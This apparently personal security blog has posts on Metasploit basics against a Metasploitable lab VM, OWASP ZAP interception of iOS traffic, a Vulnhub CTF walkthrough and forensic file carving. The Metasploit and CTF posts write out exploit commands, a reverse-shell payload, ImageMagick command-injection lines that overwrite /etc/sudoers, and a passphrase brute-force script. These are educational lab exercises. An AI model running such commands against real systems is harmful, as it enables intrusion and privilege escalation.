Kevin.net.nz

Metasploit 101

Wed, 27 Jul 2016 18:00:00 +1200

Metasploit 101

This post is a quick run down of a talk that I gave at my local information security meetup to introduce the Metasploit Framework to those that have not used it before.

Introduction

So what is Metasploit?

Metasploit is an exploitation framework with a collection of tools to help develop exploits and use them. It was created in 2003 by H D More. The Metasploit project was purchased by Rapid7 in 2009. Originally written in Perl it has now been rewritten in Ruby. It comes in 2 main flavours the open source and pro editions. While there are many tools in the Metasploit framework, today we will only be using msfconsole. Within msfconsole there are 4 main modules.

Modules

Auxiliary

In this module we can find all sorts of things that don’t really fit into the other modules. However this is where we find the modules that we can use to enumerate the target for vulnerabilities.

Exploit

In the exploit module, yes you guessed it that is where we find the exploits that use known vulnerabilities to break into a target machine. As of writing this there are over 1500 exploits in Metasploit.

Payload

A payload is a bit of code that we can have run on the target. Generally this is a way for us to get shell access.

Post

Post modules let us gather information about the target and its environment once it has been exploited. This enables to collect more intelligence about the target for privilege escalation and finding more targets.

Meterpreter

Meterperter is a special payload that gives us higher level access to the target. With this access we can upload/download files, interact with the targets file system and lots more.

We will see an example of its usage a little later on.

Setup

With the old saying “Hackers be lazy” we can take a leaf out of their book and install a Kali image with metasploit pre-installed ready to go. This will save a lot of time trying to get the setup just right.

The first thing to do is to download a Kali Virtual Machine image from here for our attach machine and a copy of Metasploitable 2 from sourceforge.

Please make sure that these VM’s aren’t publicly accessible

If you have the ability to take a snapshot with your virtualisation software now is the time to do so.

Breaking in

Before starting metasploit we must initialise the database. To do this type msfdb init into the terminal window. To start up msfconsole msfconsole type into your terminal.

Recon

first up port scanning, you can use nmap of db_nmap. The only difference between the 2 is that db_nmap saves the output in the metasploit database for you to query later.

db_nmap -T4 -A -v 172.16.1.142

this shows us that there is a truck load of ports open

using the command services we can query the databse to see what ports are open.

From this list of services we can see that Samba is enabled. Let us enumerate the samba shares.

type in use auxiliary/scanner/smb/smb_enumshares into msfconsole.

We can see what options this module requires by entering show options

The targets ip address can be set by entering set RHOSTS 172.16.1.142 in my case. To find the ip address of your target the easy way is to login to the metasploitable machine with msfadmin:msfadmin and then run ifconfig.

To execute the module enter run

Exploit

Once we have done our recon it is time to break in.

As we can see from the list of services the target is running a ftp daemon, vsftpd 2.3.4 to be exact. We can do a quick search to see if we have an exploit for that by typing in search vsftpd

Oh nice, there is one to make use of this exploit type in use exploit/unix/ftp/vsftpd_234_backdoor

same as the scanner we can set the targets ip set RHOST 172.16.1.142

to see what payloads we can use with this exploit enter show payloads

to use the payload enter set PAYLOAD cmd/unix/interact

We can check to see if there are any options to the payload we need to set by entering show options

to execute the exploit enter exploit

There we have it command execution on the target.

Let us try another exploit

as we know from the services command there are lots of interesting sevices running. One that caught my eye was the Java RMI Registry service. I happen to know that this is exploitable. To use the exploit enter use exploit/multi/misc/java_rmi_server and look at its options.

There are a few more that I need to set this time around as I’m running multiple ip adresses. I need to set RHOST 172.16.1.142 and set the local interface to listen on set SRVHOST 172.16.1.138

This time we are going to use the meterperter payload set PAYLOAD java/meterpeter/reverse_tcp

This payload requires 2 options LHOST is the ip adress the attack machine that the target needs to connect to and LPORT is the port to use.

Again to execute the exploit type in exploit

as you we have successfully exploited the target but how do we interact with it? The exploit has called us back with a meterperter shell and put that into a background session. To list your sessions enter sessions

to interact with this session enter sessions -i 1

now we are in the meterperter session. We can interact with the target and even gain shell access.

there is a lot more that can be done with meterperter, please read up on what can be done.

To exit the meterperter session type exit

Post Exploitation

Now that we have exploited the system and have a session it is time to gather more intelligence.

We attach the post module to an active session by setting the SESSION option

as with the auxiliary moudles enter run to execute

This is as far as we are going today and I’ll leave it up to you what to do next.

Beyond the Framework

If the metasploit framework isn’t enough for you then check out the following:

Metasploit Pro has more power.
Armitage - http://www.fastandeasyhacking.com/ (included in Kali) an open source pointy clicky thing.
Cobalt Strike https://www.cobaltstrike.com/ a pro pointy click thing.

Check out

There is some much more to metasploit and if you want to know a little more go and check out these awesome resources:

Using OWASP ZAP with iOS

Fri, 22 Jul 2016 13:03:31 +1200

Using OWASP ZAP with iOS

Introduction

In this post I’m going to go through how to intercept http and https traffic from an iOS device using OWASP ZAP. I have found this to be very handy when debugging web and iOS applications from the device. The version of ZAP that I am using is 2.4.3 and iOS is 9.3.

Set up HTTP Proxy

First lets open the local proxy settings in zap. Set the ip and port address that you want.

To allow your iOS device to go through zap, we need to change the wifi settings to do so.

Select Manual entry, and enter the IP address and port number that you have zap running on.

Intercepting traffic

Now that the proxy is up and running, navigate to a website (example.com) from safari.

Over in zap you can see the history of your requests.

From the Tools menu you set to break on request and break on response. This will halt the traffic to/from the browser.

Request

Response

Changing Request/Response

Viewing the traffic is nice, manipulating the traffic is even better. Change the heading from Example Domain to HACKED domain.

View the manipulated result on the device.

Dealing with encrypted traffic

Installing the root CA

To intercept the traffic on an encrypted link we must install a trusted root certificate. This will allow ZAP to encrypt and decrypt the traffic as it passes through.

Under the Tools -> Options… menu item we can find the Dynamic SSL Certificates section. From there we can generate and save the certificate to disk.

I have found the easiest way to transfer the certificate to the iOS device is to email it to an account you have on the device.

To install the certificate, touch the owasp_zap_root_ca.cer file. This will bring up the profile installer.

Press install

Viewing Encrypted Traffic

Viewing the encrypted traffic is just like before when we viewed the cleartext traffic. This time point your browser at a HTTPS site and then view the request and the response.

Request

Response

And Applications

Up until now we have been looking at traffic generated via safari. You can also look at traffic sent via applications. Below is an example of traffic between the FitBit App and their server.

Hacking the Gibson 0.2 from vulnhub.com

Thu, 19 May 2016 17:02:01 +1200

Hacking the Gibson 0.2 from vulnhub.com

Introduction

In this post I’m doing a walk though of capturing the flag of a machine from Vulnhub. The target machine is Gibson which is a fun boot2root/CTF.

Initial Recon

nmap

I always like to start my recon with the following nmap command.

nmap -sS -sU -T4 -A -v 172.16.1.134

this netted the result of:

Website

Seeing that port 80 is open I point my web browser at http://172.16.1.134 to have a peek at the initial page.

This shows directory list with davinci.html

Looks like a handy clue, however before I break out hydra, I view the source code for the page.

Viewing the source code reveals another clue.

ssh

From the clues in the html source I now have 2 possible users (Margo & eugene) and one possible password (god). Before starting up hydra I just take a punt and try ssh into the box with user of margo and password of god.

Just like that I’ve got low privilege shell access.

Low privilege recon

Using g0tmi1k’s low privilige recon post I found

doing some research on convert, I go look at the man page and it tells me to see also imagemagick. At this point I’m thinking its only be a couple of weeks since CVE-2016-3714 Over on exploit-db.com I find a nice little proof of concept.

root shell

Now that I have command execute as root I try for a quick win by passing through a netcat reverse shell back to my attack machine. however that ends in a big pile of fail. Using the sudo attack I copy the /etc/sudoers file and edit it to give margo access to run /bin/su with no password. I copy the file back and I’m now root.

sudo convert 'https://127.0.0.1"cp /etc/sudoers /home/margo/sudoers"' out.png
sudo convert 'https://127.0.0.1"chmod margo:margo /home/margo/sudoers"' out.png
vi /etc/home/margo/sudoers

added the following for margo

margo ALL=(ALL) NOPASSWD: /bin/su

sudo convert 'https://127.0.0.1"chmod root:root /home/margo/sudoers"' out.png
sudo convert 'https://127.0.0.1"cp /home/margo/sudoers /etc/sudoers"' out.png

sudo su

Finding the flag

With root access I went looking for the flag in all the usual places but it was not to be found. I remembered back in my low priv recon seeing a vnc port open

I did some ssh port redirection and connected my vncviewer to have a peek.

ssh -L 5900:127.0.0.1:5900 margo@172.16.1.134

interesting a DOS VM within the gibson

In keeping wtih the Hackers theme, look inside the GARBAGE directory

Grab the files and look at them. I like the look of FILE.IMG as I have had good luck in the past extracting information from image files. Mount it and dig around for more clues.

Found a couple of things a hint and the flag, however the flag is encrypted.

hint.txt
http://www.imdb.com/title/tt0117951/ and
http://www.imdb.com/title/tt0113243/ have
someone in common... Can you remember his
original nom de plume in 1988...?

Decrypting the flag

Knowing the answer to the hint I try to decrypt the flag.

gpg --output flag.txt --batch --passphrase "Zero Cool" --decrypt flag.txt.gpg

no luck, so time to brute force this. I’m going to start out simple with a seed list and add some leetspeak to expand it.

seed.txt
Zero Cool
zerocool
Zero Kool
zeroKool
crash override
crashoverride

I found a leetify perl script on the net, I don’t know who the orginal author is, so to who ever you are thank you.

perl leetify.pl < seed.txt > words.txt

create a brute force script

#!/bin/bash
for pass in $(cat words.txt)
do
  gpg --output flag.txt --batch --passphrase "$pass" --decrypt flag.txt.gpg
  if [ -a flag.txt ]
    then
      cat flag.txt
      exit 0
  fi
done

run the script and find the treasure

Thank you Knightmare and the vulnhub crew for a great challenge.

Recovering Data

Wed, 27 Apr 2016 19:00:00 +1200

Recovering Data

This post is a quick run down of a lightning talk that I gave at my local information security meetup.

Introduction

Tonight we are going recovering deleted files from a USB thumb drive. Since I’m a fan of Kali linux, all the tools demonstrated come pre-installed and can be used from a booting off a live CD or USB Thumb drive.

Image the drive

First of all I like to image the drive so that I’m not working on the original source. This can be helpful if you can’t keep the source device. When imaging the drive we can use GNU dd, however there are a couple of forks of dd that have added features for computer forensics. These are dc3dd and dcflddd, tonight I will use the later.

$ dcfldd --help
Usage: dcfldd [OPTION]...
Copy a file, converting and formatting according to the options.

  bs=BYTES                 force ibs=BYTES and obs=BYTES
  cbs=BYTES                convert BYTES bytes at a time
  conv=KEYWORDS            convert the file as per the comma separated keyword list
  count=BLOCKS             copy only BLOCKS input blocks
  ibs=BYTES                read BYTES bytes at a time
  if=FILE                  read from FILE instead of stdin
  obs=BYTES                write BYTES bytes at a time
  of=FILE                  write to FILE instead of stdout
                            NOTE: of=FILE may be used several times to write
                                  output to multiple files simultaneously
  of:=COMMAND              exec and write output to process COMMAND
  seek=BLOCKS              skip BLOCKS obs-sized blocks at start of output
  skip=BLOCKS              skip BLOCKS ibs-sized blocks at start of input
  pattern=HEX              use the specified binary pattern as input
  textpattern=TEXT         use repeating TEXT as input
  errlog=FILE              send error messages to FILE as well as stderr
  hashwindow=BYTES         perform a hash on every BYTES amount of data
  hash=NAME                either md5, sha1, sha256, sha384 or sha512
                             default algorithm is md5. To select multiple
                             algorithms to run simultaneously enter the names
                             in a comma separated list
  hashlog=FILE             send MD5 hash output to FILE instead of stderr
                             if you are using multiple hash algorithms you
                             can send each to a separate file using the
                             convention ALGORITHMlog=FILE, for example
                             md5log=FILE1, sha1log=FILE2, etc.
  hashlog:=COMMAND         exec and write hashlog to process COMMAND
                             ALGORITHMlog:=COMMAND also works in the same fashion
  hashconv=[before|after]  perform the hashing before or after the conversions
  hashformat=FORMAT        display each hashwindow according to FORMAT
                             the hash format mini-language is described below
  totalhashformat=FORMAT   display the total hash value according to FORMAT
  status=[on|off]          display a continual status message on stderr
                             default state is "on"
  statusinterval=N         update the status message every N blocks
                             default value is 256
  sizeprobe=[if|of]        determine the size of the input or output file
                             for use with status messages. (this option
                             gives you a percentage indicator)
                             WARNING: do not use this option against a
                                      tape device.
  split=BYTES              write every BYTES amount of data to a new file
                             This operation applies to any of=FILE that follows
  splitformat=TEXT         the file extension format for split operation.
                             you may use any number of 'a' or 'n' in any combo
                             the default format is "nnn"
                             NOTE: The split and splitformat options take effect
                                  only for output files specified AFTER these
                                  options appear in the command line.  Likewise,
                                  you may specify these several times for
                                  for different output files within the same
                                  command line. you may use as many digits in
                                  any combination you would like.
                                  (e.g. "anaannnaana" would be valid, but
                                  quite insane)
  vf=FILE                  verify that FILE matches the specified input
  verifylog=FILE           send verify results to FILE instead of stderr
  verifylog:=COMMAND       exec and write verify results to process COMMAND

    --help           display this help and exit
    --version        output version information and exit

The structure of of FORMAT may contain any valid text and special variables.
The built-in variables are used the following format: #variable_name#
To pass FORMAT strings to the program from a command line, it may be
necessary to surround your FORMAT strings with "quotes."
The built-in variables are listed below:

  window_start    The beginning byte offset of the hashwindow
  window_end      The ending byte offset of the hashwindow
  block_start     The beginning block (by input blocksize) of the window
  block_end       The ending block (by input blocksize) of the hash window
  hash            The hash value
  algorithm       The name of the hash algorithm

For example, the default FORMAT for hashformat and totalhashformat are:
   hashformat="#window_start# - #window_end#: #hash#"
   totalhashformat="Total (#algorithm#): #hash#"

The FORMAT structure accepts the following escape codes:
  \n   Newline
  \t   Tab
  \r   Carriage return
  \\   Insert the '\' character
  ##   Insert the '#' character as text, not a variable

BLOCKS and BYTES may be followed by the following multiplicative suffixes:
xM M, c 1, w 2, b 512, kD 1000, k 1024, MD 1,000,000, M 1,048,576,
GD 1,000,000,000, G 1,073,741,824, and so on for T, P, E, Z, Y.
Each KEYWORD may be:

  ascii     from EBCDIC to ASCII
  ebcdic    from ASCII to EBCDIC
  ibm       from ASCII to alternated EBCDIC
  block     pad newline-terminated records with spaces to cbs-size
  unblock   replace trailing spaces in cbs-size records with newline
  lcase     change upper case to lower case
  notrunc   do not truncate the output file
  ucase     change lower case to upper case
  swab      swap every pair of input bytes
  noerror   continue after read errors
  sync      pad every input block with NULs to ibs-size; when used
            with block or unblock, pad with spaces rather than NULs

Report bugs to <nicholasharbour@yahoo.com>.

As I’m running low on disk space I am going to save the drive image to an external drive. This may also come in handy if you are booting from removeable media. For now I’m only going to use the if and of arguments.

dcfldd if=<source device> of=<target image>

NOTE: it is important to get the source and target around the right way as you have the potential to distory data!

A handy way to see what drives you connected is to use the lsblk command.

lsblk -io KNAME,TYPE,SIZE,MODEL

now lets image the drive

$ dcfldd if=/dev/sdb of=/media/root/ELEMENTS/isig.img

Recovering the files

Now we have an image file it is time to carve out the files from it. Kali has both foremost and scalpel installed. While the authors of foremost recommend using scalpel, I have had the most sucess with foremost out of the box.

$ foremost -h
foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus.
$ foremost [-v|-V|-h|-T|-Q|-q|-a|-w-d] [-t <type>] [-s <blocks>] [-k <size>] 
	[-b <size>] [-c <file>] [-o <dir>] [-i <file] 

-V  - display copyright information and exit
-t  - specify file type.  (-t jpeg,pdf ...) 
-d  - turn on indirect block detection (for UNIX file-systems) 
-i  - specify input file (default is stdin) 
-a  - Write all headers, perform no error detection (corrupted files) 
-w  - Only write the audit file, do not write any detected files to the disk 
-o  - set output directory (defaults to output)
-c  - set configuration file to use (defaults to foremost.conf)
-q  - enables quick mode. Search are performed on 512 byte boundaries.
-Q  - enables quiet mode. Suppress output messages. 
-v  - verbose mode. Logs all messages to screen

The options that we are going to use:

-t all to carve out as many files as possible
-v verbose output
-in isig.img the drive image to process
-o foremost the directory to place the found files

$ foremost -t all -v -in isig.img -o foremost

After some time the files will be carved out into the foremost directory. Lets have a look what is in there.

$ tree foremost/
foremost/
├── audit.txt
├── docx
│   └── 00106328.docx
├── exe
│   ├── 00107944.exe
│   └── 00129456.exe
├── gif
│   ├── 00111088.gif
  ... 
└── png
    ├── 00118384.png
    ├── 00127448.png
    ├── 00128384.png
    ├── 00129920.png
    ├── 00131136.png
    └── 00143742.png

Now we can compare that to the original USB thumb drive.

$ tree /media/root/HOT
HOT
├── 00018664.exe
├── 2011 AHOT TK_v3.pdf
├── Chapter Handbook
│   ├── A.Preface.pdf
│   ├── B. Charter.pdf
│   ├── C.Officer Positions.pdf
│   ├── D.Benefits.pdf
│   ├── E.Activities.pdf
│   ├── F.Chapter Business.pdf
│   ├── G.Annual Meeting.pdf
│   ├── H.Marketing Media.pdf
│   ├── I.Safe Riding Tips.pdf
│   ├── J. State Rallies.pdf
│   ├── K.Reference Docs.pdf
│   ├── L.Index.pdf
│   ├── Opening Pages.pdf
│   └── Table of contents.pdf
├── forensicsT1C1.jpg
├── forensicsT1C2.img
├── key.txt
└── shadow

We see that 00106328.docx has been recovered. The recovered files both present and deleted are carved out and given an unique number. Sometimes you get double ups and fragments, it depends on how the files are written to disk and calculated without the aid of the File Allocation Table.

First post

Mon, 25 Apr 2016 16:58:58 +1200

This is the obligatory first post. I’m building this site with Hogo

For now here are some interesting links:

About Kevin

Mon, 25 Apr 2016 16:37:36 +1200

This is the personal site of Kevin Alcock. From time to time I will be posting little nuggets that I have found interesting.

As for me I’ve been programming for a living since 1986 and yes that is a long time.

Contact Kevin

Mon, 25 Apr 2016 16:37:30 +1200

+64 3 669 2179
kalcock@xtra.co.nz